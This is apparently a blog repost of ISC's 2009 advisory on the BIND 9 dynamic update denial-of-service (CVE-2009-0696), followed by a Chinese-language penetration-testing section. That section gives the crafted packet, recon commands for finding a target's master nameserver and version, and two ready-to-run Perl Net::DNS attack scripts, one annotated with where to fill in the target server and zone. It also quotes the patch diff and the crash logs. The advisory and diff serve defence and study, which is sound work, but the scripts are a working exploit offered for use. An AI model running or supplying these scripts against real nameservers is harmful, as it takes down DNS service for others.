BIND Dynamic Update DoS

CVE:		CVE-2009-0696
CERT:		VU#725188
Posting date:		2009-07-28
Program Impacted:		BIND
Versions affected:		BIND 9 (all versions)
Severity:		High
Exploitable:		remotely
Summary:		BIND denial of service (server crash) caused by receipt of a specific remote dynamic update message.

Description:

Urgent: this exploit is public. Please upgrade immediately.

Receipt of a specially-crafted dynamic update message to a zone for which the server is the master may cause BIND 9 servers to exit. Testing indicates that the attack packet has to be formulated against a zone for which that machine is a master. Launching the attack against slave zones does not trigger the assert.

This vulnerability affects all servers that are masters for one or more zones – it is not limited to those that are configured to allow dynamic updates. Access controls will not provide an effective workaround.

dns_db_findrdataset() fails when the prerequisite section of the dynamic update message contains a record of type “ANY” and where at least one RRset for this FQDN exists on the server.

db.c:659: REQUIRE(type != ((dns_rdatatype_t)dns_rdatatype_any)) failed exiting (due to assertion failure).

Workarounds:

None.

(Some sites may have firewalls that can be configured with packet filtering techniques to prevent nsupdate messages from reaching their nameservers.)

Active exploits:

An active remote exploit is in wide circulation at this time.

Solution:

Upgrade BIND to one of 9.4.3-P3, 9.5.1-P3 or 9.6.1-P1. These versions can be downloaded from:

http://ftp.isc.org/isc/bind9/9.6.1-P1/bind-9.6.1-P1.tar.gz
http://ftp.isc.org/isc/bind9/9.5.1-P3/bind-9.5.1-P3.tar.gz
http://ftp.isc.org/isc/bind9/9.4.3-P3/bind-9.4.3-P3.tar.gz

Acknowledgment:

Matthias Urlichs for reporting the problem.
Tom Daly for methodical follow-on testing.

Revision History:

2009-07-28 Initial text
2009-07-29 Update to reflect Tom Daly's findings

攻击脚本：

bind can be crashed with an update packet:

Packet in tcpdump:

15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]

Another view of the Packet:

| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0    opcode = UPDATE    rcode = NOERROR
| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa.       IN      SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       IN      ANY     ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa.        0       ANY     ANY     ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com.        0       ANY     TSIG    HMAC-MD5.SIG-ALG.REG.INT. NOERROR

#!/usr/bin/perl -w
use Net::DNS;
our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';
my $rzone = '<zone>';
my $rptr = "1.$rzone";
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

针对这个漏洞的渗透测试,有两个比较有用的命令:
1.找到某个域名的主DNS服务:

dig +trace www.example.com #找到www.example.com的dns服务器地址

2.查询某个dns服务器的版本号:

dig @xxx.xx.xx.xxx txt chaos version.bind

再说一下造成这个漏洞的原因,没有仔细的分析,只是diff了一下9.6.1和9.6.1-1p。

diff -r bind-9.6.1/bin/named/update.c bind-9.6.1-P1/bin/named/update.c
18c18
< /* $Id: update.c,v 1.151.12.5 2009/04/30 07:03:37 marka Exp $ */
---
> /* $Id: update.c,v 1.151.12.5.12.1 2009/07/28 14:18:08 marka Exp $ */
982c982,986
< else
---
> else if (type == dns_rdatatype_any) {
> dns_db_detachnode(db, &node);
> dns_diff_clear(&trash);
> return (DNS_R_NXRRSET);
> } else

在bind崩溃时,所提供的信息为:
03-Aug-2009 16:43:24.246 db.c:649: REQUIRE(type != ((dns_rdatatype_t)dns_rdatatype_any)) failed
03-Aug-2009 16:43:24.246 exiting (due to assertion failure)
看来是bind9对dynamic update的数据包中,没有考虑到会有type为dns_rdatatype_any这一类型的数据位导致。因此该漏洞也仅仅会停留在DoS，不会有exploit的可能了。

看来,针对应用协议类的fuzz还是有潜力可挖的。

攻击脚本：

#!/usr/bin/perl -w
use Net::DNS;
our $NSI = 'NS_IP'; 将NS_IP替换成ns的ip地址
my $rzone = 'NS_NAME'; #将NS_NAME替换成要攻击的主域名如showrun.com
my $rptr = "www.$rzone"; #将www一定要替换成真实存在的子域名
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);
#$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

参考:
关于DNS的dynamic update： http://www.ietf.org/rfc/rfc3007.txt
http://www.net-dns.org/docs/Net/DNS/Update.html
http://downloads.securityfocus.com/vulnerabilities/exploits/35848.txt

failed to load Net::DNS::Resolver: Can't locate Net/DNS.pm in @INC (@INC contains: /usr/local/lib/perl5/site_perl/5.6.1 /usr/local/lib/perl5/site_perl/5.6.1/mach /usr/local/lib/perl5/site_perl /usr/local/lib/perl5/5.6.1/BSDPAN /usr/local/lib/perl5/5.6.1/mach /usr/local/lib/perl5/5.6.1) at /usr/local/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Plugin/URIDNSBL.pm line 113.

perl Makefile.PL
make
make test
make install

此文章由 flyinweb 于 2009-08-06 11:14:30 编辑